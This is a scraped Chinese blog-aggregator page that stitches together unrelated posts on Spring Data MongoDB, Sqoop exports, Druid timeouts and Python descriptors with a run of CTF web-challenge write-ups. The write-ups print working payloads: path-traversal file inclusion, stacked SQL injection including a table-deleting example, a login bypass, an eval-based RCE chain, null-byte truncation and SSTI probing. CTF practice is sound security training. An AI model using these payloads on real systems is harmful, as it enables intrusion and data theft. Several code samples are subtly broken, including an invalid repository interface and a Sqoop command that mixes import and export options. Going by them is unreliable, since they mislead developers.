Object entity) { mongoTemplate.insert(entity, collectionName); } public List find(String collectionName, Query query) { return mongoTemplate.find(query, Object.class, collectionName); } 6. 使用Repository操作MongoDB 除了MongoTemplate之外,SpringDataMongoDB还提供了Repository接口,它可以帮助我们更加方便地进行数据库操作。我们完全可以把这个接口“继承”下来,然后自己动手编写几个核心的方法,就像是插入数据、查找信息、更新记录、删除项目这些基本操作,让它们各司其职,活跃在我们的程序里。下面是一个简单的示例: java @Repository public interface UserRepository extends MongoRepository { User findByUsername(String username); void deleteByUsername(String username); default void save(User user) { if (user.getId() == null) { user.setId(UUID.randomUUID().toString()); } super.save(user); } @Query(value = "{'username':?0}") List findByUsername(String username); } 7. 总结 总的来说,SpringBoot与MongoDB的集成是非常简单和便捷的。只需要几步简单的配置,我们就可以使用SpringBoot的强大功能来操作MongoDB。而且你知道吗,SpringDataMongoDB这家伙还藏着不少好东西嘞,像数据映射、查询、聚合这些高级功能,全都是它的拿手好戏。这样一来,我们开发应用程序就能又快又高效,简直像是插上了小翅膀一样飞速前进!所以,如果你正在琢磨着用NoSQL数据库来搭建你的数据存储方案,那我真心实意地拍胸脯推荐你试试SpringBoot配上MongoDB这个黄金组合,准保不会让你失望!
2023-04-09 13:34:32
76
岁月如歌-t
MySQL
...FS) 是一种分布式文件系统,可以存储大量数据并提供高可用性和容错性。不过呢,HDFS这家伙可不懂SQL查询这门子事儿,所以啊,如果我们想对数据进行更深度的分析和复杂的查询操作,就得先把数据从HDFS里导出来,然后存到像是MySQL这样的SQL数据库中才行。 步骤一:设置环境 首先,我们需要确保已经安装了所有必要的工具和软件。以下是您可能需要的一些组件: - Apache Sqoop:这是一个用于在Hadoop和关系型数据库之间进行数据迁移的工具。 - MySQL:这是一个流行的开源关系型数据库管理系统。 - Java Development Kit (JDK):这是开发Java应用程序所必需的一组工具。 在Windows上,你可以在这里找到Java JDK的下载链接:https://www.oracle.com/java/technologies/javase-downloads.html 。在MacOS上,你可以在这里找到Java JDK的下载链接:https://jdk.java.net/15/ 步骤二:配置Hadoop和MySQL 在开始之前,请确保您的Hadoop和MySQL已经正确配置并运行。 对于Hadoop,您可以查看以下教程:https://hadoop.apache.org/docs/r2.7.3/hadoop-project-dist/hadoop-common/SingleCluster.html 对于MySQL,您可以参考官方文档:https://dev.mysql.com/doc/refman/8.0/en/installing-binary-packages.html 步骤三:创建MySQL表 在开始导出数据之前,我们需要在MySQL中创建一个表来存储数据。以下是一个简单的例子: CREATE TABLE students ( id int(11) NOT NULL AUTO_INCREMENT, name varchar(45) DEFAULT NULL, age int(11) DEFAULT NULL, PRIMARY KEY (id) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 这个表将包含学生的ID、姓名和年龄字段。 步骤四:编写Sqoop脚本 现在我们可以使用Sqoop将HDFS中的数据导入到MySQL表中。以下是一个基本的Sqoop脚本示例: bash -sqoop --connect jdbc:mysql://localhost:3306/test \ -m 1 \ --num-mappers 1 \ --target-dir /user/hadoop/students \ --delete-target-dir \ --split-by id \ --as-textfile \ --fields-terminated-by '|' \ --null-string 'NULL' \ --null-non-string '\\N' \ --check-column id \ --check-nulls \ --query "SELECT id, name, age FROM students WHERE age > 18" 这个脚本做了以下几件事: - 使用--connect选项连接到MySQL服务器和测试数据库。 - 使用-m和--num-mappers选项设置映射器的数量。在这个例子中,我们只有一个映射器。 - 使用--target-dir选项指定输出目录。在这个例子中,我们将数据导出到/user/hadoop/students目录下。 - 使用--delete-target-dir选项删除目标目录中的所有内容,以防数据冲突。 - 使用--split-by选项指定根据哪个字段进行拆分。在这个例子中,我们将数据按学生ID进行拆分。 - 使用--as-textfile选项指定数据格式为文本文件。 - 使用--fields-terminated-by选项指定字段分隔符。在这个例子中,我们将字段分隔符设置为竖线(|)。 - 使用--null-string和--null-non-string选项指定空值的表示方式。在这个例子中,我们将NULL字符串设置为空格,将非字符串空值设置为\\N。 - 使用--check-column和--check-nulls选项指定检查哪个字段和是否有空值。在这个例子中,我们将检查学生ID是否为空,并且如果有,将记录为NULL。 - 使用--query选项指定要从中读取数据的SQL查询语句。在这个例子中,我们只选择年龄大于18的学生。 请注意,这只是一个基本的示例。实际的脚本可能会有所不同,具体取决于您的数据和需求。 步骤五:运行Sqoop脚本 最后,我们可以使用以下命令运行Sqoop脚本: bash -sqoop \ -Dmapreduce.job.user.classpath.first=true \ --libjars $SQOOP_HOME/lib/mysql-connector-java-8.0.24.jar \ --connect jdbc:mysql://localhost:3306/test \ -m 1 \ --num-mappers 1 \ --target-dir /user/hadoop/students \ --delete-target-dir \ --split-by id \ --as-textfile \ --fields-terminated-by '|' \ --null-string 'NULL' \ --null-non-string '\\N' \ --check-column id \ --check-nulls \ --query "SELECT id, name, age FROM students WHERE age > 18" 注意,我们添加了一个-Dmapreduce.job.user.classpath.first=true参数,这样就可以保证我们的自定义JAR包在任务的classpath列表中处于最前面的位置。 如果一切正常,我们应该可以看到一条成功的消息,并且可以在MySQL中看到导出的数据。 总结 本文介绍了如何使用Apache Sqoop将HDFS中的数据导出到MySQL数据库。咱们先给环境捯饬得妥妥当当,然后捣鼓出一个MySQL表,再接再厉,编了个Sqoop脚本。最后,咱就让这个脚本大展身手,把数据导出溜溜的。希望这篇文章能帮助你解决这个问题!
2023-04-12 16:50:07
247
素颜如水_t
SpringBoot
...在pom.xml文件中添加Druid的相关依赖: xml com.alibaba druid-spring-boot-starter 1.2.8 3.2 配置数据源 接着,在application.yml文件中配置Druid的数据源信息: yaml spring: datasource: type: com.alibaba.druid.pool.DruidDataSource driver-class-name: oracle.jdbc.driver.OracleDriver url: jdbc:oracle:thin:@localhost:1521:orcl username: your_username password: your_password druid: initial-size: 5 max-active: 20 min-idle: 5 max-wait: 60000 time-between-eviction-runs-millis: 60000 min-evictable-idle-time-millis: 300000 validation-query: SELECT 1 FROM DUAL test-while-idle: true test-on-borrow: false test-on-return: false 这段配置看似简单,但实际上每一项参数都需要仔细斟酌。比如说啊,“max-wait”这个参数呢,就是说咱们能等连接连上的最长时间,单位是毫秒,相当于给它设了个“最长等待时间”;然后还有个“validation-query”,这个名字听起来就挺专业的,它的作用就是检查连接是不是还正常好用;最后那个“test-while-idle”,它就像是个“巡逻兵”,负责判断要不要在连接空闲的时候去检测一下这条连接还能不能用。 --- 4. 查询超时问题的初步排查 当我第一次遇到查询超时问题时,我的第一反应是:是不是Oracle那边的SQL语句太慢了?于是,我开始检查SQL语句的性能。 4.1 检查SQL语句 我用PL/SQL Developer连接到Oracle数据库,运行了一下报错的SQL语句。结果显示,这条SQL语句确实需要花费较长时间才能完成。但问题是,为什么Spring Boot会直接抛出超时异常呢? 这时,我才意识到,可能是Druid的数据源配置有问题。于是我翻阅了Druid的官方文档,发现了一个关键点:Druid默认的查询超时时间为10秒。 4.2 修改Druid的查询超时时间 为了延长查询超时时间,我在application.yml中加入了以下配置: yaml spring: datasource: druid: query-timeout: 30000 这里的query-timeout参数就是用来设置查询超时时间的,单位是毫秒。经过这次调整后,我发现查询超时的问题暂时得到了缓解。 --- 5. 进一步优化 结合Oracle的设置 虽然Druid的配置解决了部分问题,但我仍然觉得不够完美。于是,我又转向了Oracle数据库本身的设置。 5.1 设置Oracle的查询超时 在Oracle中,可以通过设置statement_timeout参数来控制查询超时时间。这个参数可以在会话级别或全局级别进行设置。 例如,在Spring Boot项目中,我们可以通过JDBC连接字符串传递这个参数: yaml spring: datasource: url: jdbc:oracle:thin:@localhost:1521:orcl?oracle.net.CONNECT_TIMEOUT=30000&oracle.jdbc.ReadTimeout=30000 这里的CONNECT_TIMEOUT和ReadTimeout分别表示连接超时时间和读取超时时间。通过这种方式,我们可以进一步提高系统的容错能力。 --- 6. 我的感悟与总结 经过这次折腾,我对Spring Boot与Druid的集成有了更深的理解。说实话,好多技术难题没那么玄乎,就是看着吓人而已。只要你肯静下心来琢磨琢磨,肯定能想出个辙来! 在这里,我也想给新手朋友们一些建议: 1. 多看官方文档 无论是Spring Boot还是Druid,它们的官方文档都非常详细,很多时候答案就在那里。 2. 学会调试 遇到问题时,不要急于求解,先用调试工具一步步分析问题所在。 3. 保持耐心 技术问题往往需要反复尝试,不要轻易放弃。 最后,我想说的是,编程之路充满了挑战,但也正因为如此才显得有趣。希望大家都能在这个过程中找到属于自己的乐趣! --- 好了,这篇文章就到这里啦!如果你也有类似的经历或想法,欢迎在评论区跟我交流哦!
2025-04-21 15:34:10
39
冬日暖阳_
转载文章
...我们先来看看一段代码classPerson(object): """""" ---------------------------------------------------------------------- def__init__(self, first_name, last_name): """Constructor""" self.first_name = first_name self.last_name = last_name ---------------------------------------------------------------------- @property deffull_name(self): """ Return the full name """ return"%s %s"% (self.first_name, self.last_name) if__name__=="__main__": person = Person("Mike","Driscoll") print(person.full_name) 'Mike Driscoll' print(person.first_name) 'Mike' 这段代大家肯定很熟悉,恩, property 嘛,谁不知道呢,但是 property 的实现机制大家清楚么?什么不清楚?那还学个毛的 Python 啊。。。开个玩笑,我们看下面一段代码classProperty(object): "Emulate PyProperty_Type() in Objects/descrobject.c" def__init__(self, fget=None, fset=None, fdel=None, doc=None): self.fget = fget self.fset = fset self.fdel = fdel ifdocisNoneandfgetisnotNone: doc = fget.__doc__ self.__doc__ = doc def__get__(self, obj, objtype=None): ifobjisNone: returnself ifself.fgetisNone: raiseAttributeError("unreadable attribute") returnself.fget(obj) def__set__(self, obj, value): ifself.fsetisNone: raiseAttributeError("can't set attribute") self.fset(obj, value) def__delete__(self, obj): ifself.fdelisNone: raiseAttributeError("can't delete attribute") self.fdel(obj) defgetter(self, fget): returntype(self)(fget, self.fset, self.fdel, self.__doc__) defsetter(self, fset): returntype(self)(self.fget, fset, self.fdel, self.__doc__) defdeleter(self, fdel): returntype(self)(self.fget, self.fset, fdel, self.__doc__) 看起来是不是很复杂,没事,我们来一步步的看。不过这里我们首先给出一个结论: Descriptors 是一种特殊 的对象,这种对象实现了 __get__ , __set__ , __delete__ 这三个特殊方法。 详解描述符 说说 Property 在上文,我们给出了 Propery 实现代码,现在让我们来详细说说这个classPerson(object): """""" ---------------------------------------------------------------------- def__init__(self, first_name, last_name): """Constructor""" self.first_name = first_name self.last_name = last_name ---------------------------------------------------------------------- @Property deffull_name(self): """ Return the full name """ return"%s %s"% (self.first_name, self.last_name) if__name__=="__main__": person = Person("Mike","Driscoll") print(person.full_name) 'Mike Driscoll' print(person.first_name) 'Mike' 首先,如果你对装饰器不了解的话,你可能要去看看这篇文章,简而言之,在我们正式运行代码之前,我们的解释器就会对我们的代码进行一次扫描,对涉及装饰器的部分进行替换。类装饰器同理。在上文中,这段代码@Property deffull_name(self): """ Return the full name """ return"%s %s"% (self.first_name, self.last_name) 会触发这样一个过程,即 full_name=Property(full_name) 。然后在我们后面所实例化对象之后我们调用 person.full_name 这样一个过程其实等价于 person.full_name.__get__(person) 然后进而触发 __get__() 方法里所写的 return self.fget(obj) 即原本上我们所编写的 def full_name 内的执行代码。 这个时候,同志们可以去思考下 getter() , setter() ,以及 deleter() 的具体运行机制了=。=如果还是有问题,欢迎在评论里进行讨论。 关于描述符 还记得之前我们所提到的一个定义么: Descriptors 是一种特殊的对象,这种对象实现了 __get__ , __set__ , __delete__ 这三个特殊方法 。然后在 Python 官方文档的说明中,为了体现描述符的重要性,有这样一段话:“They are the mechanism behind properties, methods, static methods, class methods, and super(). They are used throughout Python itself to implement the new style classes introduced in version 2.2. ” 简而言之就是 先有描述符后有天,秒天秒地秒空气 。恩,在新式类中,属性,方法调用,静态方法,类方法等都是基于描述符的特定使用。 OK,你可能想问,为什么描述符是这么重要呢?别急,我们接着看 使用描述符 首先请看下一段代码 classA(object):注:在 Python 3.x 版本中,对于 new class 的使用不需要显式的指定从 object 类进行继承,如果在 Python 2.X(x>2)的版本中则需要defa(self): pass if__name__=="__main__": a=A() a.a() 大家都注意到了我们存在着这样一个语句 a.a() ,好的,现在请大家思考下,我们在调用这个方法的时候发生了什么? OK?想出来了么?没有?好的我们继续 首先我们调用一个属性的时候,不管是成员还是方法,我们都会触发这样一个方法用于调用属性 __getattribute__() ,在我们的 __getattribute__() 方法中,如果我们尝试调用的属性实现了我们的描述符协议,那么会产生这样一个调用过程 type(a).__dict__['a'].__get__(b,type(b)) 。好的这里我们又要给出一个结论了:“在这样一个调用过程中,有这样一个优先级顺序,如果我们所尝试调用属性是一个 data descriptors ,那么不管这个属性是否存在我们的实例的 __dict__ 字典中,优先调用我们描述符里的 __get__ 方法,如果我们所尝试调用属性是一个 non data descriptors ,那么我们优先调用我们实例里的 __dict__ 里的存在的属性,如果不存在,则依照相应原则往上查找我们类,父类中的 __dict__ 中所包含的属性,一旦属性存在,则调用 __get__ 方法,如果不存在则调用 __getattr__() 方法”。理解起来有点抽象?没事,我们马上会讲,不过在这里,我们先要解释下 data descriptors 与 non data descriptors ,再来看一个例子。什么是 data descriptors 与 non data descriptors 呢?其实很简单,在描述符中同时实现了 __get__ 与 __set__ 协议的描述符是 data descriptors ,如果只实现了 __get__ 协议的则是 non data descriptors 。好了我们现在来看个例子:importmath classlazyproperty: def__init__(self, func): self.func = func def__get__(self, instance, owner): ifinstanceisNone: returnself else: value = self.func(instance) setattr(instance, self.func.__name__, value) returnvalue classCircle: def__init__(self, radius): self.radius = radius pass @lazyproperty defarea(self): print("Com") returnmath.pi self.radius 2 deftest(self): pass if__name__=='__main__': c=Circle(4) print(c.area) 好的,让我们仔细来看看这段代码,首先类描述符 @lazyproperty 的替换过程,前面已经说了,我们不在重复。接着,在我们第一次调用 c.area 的时候,我们首先查询实例 c 的 __dict__ 中是否存在着 area 描述符,然后发现在 c 中既不存在描述符,也不存在这样一个属性,接着我们向上查询 Circle 中的 __dict__ ,然后查找到名为 area 的属性,同时这是一个 non data descriptors ,由于我们的实例字典内并不存在 area 属性,那么我们便调用类字典中的 area 的 __get__ 方法,并在 __get__ 方法中通过调用 setattr 方法为实例字典注册属性 area 。紧接着,我们在后续调用 c.area 的时候,我们能在实例字典中找到 area 属性的存在,且类字典中的 area 是一个 non data descriptors ,于是我们不会触发代码里所实现的 __get__ 方法,而是直接从实例的字典中直接获取属性值。 描述符的使用 描述符的使用面很广,不过其主要的目的在于让我们的调用过程变得可控。因此我们在一些需要对我们调用过程实行精细控制的时候,使用描述符,比如我们之前提到的这个例子classlazyproperty: def__init__(self, func): self.func = func def__get__(self, instance, owner): ifinstanceisNone: returnself else: value = self.func(instance) setattr(instance, self.func.__name__, value) returnvalue def__set__(self, instance, value=0): pass importmath classCircle: def__init__(self, radius): self.radius = radius pass @lazyproperty defarea(self, value=0): print("Com") ifvalue ==0andself.radius ==0: raiseTypeError("Something went wring") returnmath.pi value 2ifvalue !=0elsemath.pi self.radius 2 deftest(self): pass 利用描述符的特性实现懒加载,再比如,我们可以控制属性赋值的值classProperty(object): "Emulate PyProperty_Type() in Objects/descrobject.c" def__init__(self, fget=None, fset=None, fdel=None, doc=None): self.fget = fget self.fset = fset self.fdel = fdel ifdocisNoneandfgetisnotNone: doc = fget.__doc__ self.__doc__ = doc def__get__(self, obj, objtype=None): ifobjisNone: returnself ifself.fgetisNone: raiseAttributeError("unreadable attribute") returnself.fget(obj) def__set__(self, obj, value=None): ifvalueisNone: raiseTypeError("You cant to set value as None") ifself.fsetisNone: raiseAttributeError("can't set attribute") self.fset(obj, value) def__delete__(self, obj): ifself.fdelisNone: raiseAttributeError("can't delete attribute") self.fdel(obj) defgetter(self, fget): returntype(self)(fget, self.fset, self.fdel, self.__doc__) defsetter(self, fset): returntype(self)(self.fget, fset, self.fdel, self.__doc__) defdeleter(self, fdel): returntype(self)(self.fget, self.fset, fdel, self.__doc__) classtest(): def__init__(self, value): self.value = value @Property defValue(self): returnself.value @Value.setter deftest(self, x): self.value = x 如上面的例子所描述的一样,我们可以判断所传入的值是否有效等等。 以上就是Python 描述符(Descriptor)入门,更多相关文章请关注PHP中文网(www.gxlcms.com)! 本条技术文章来源于互联网,如果无意侵犯您的权益请点击此处反馈版权投诉 本文系统来源:php中文网 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_39736934/article/details/112888600。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-05-07 19:03:49
94
转载
转载文章
...in 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话,empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入:1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 (为2) 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名) 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多 这里通过 MYSQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 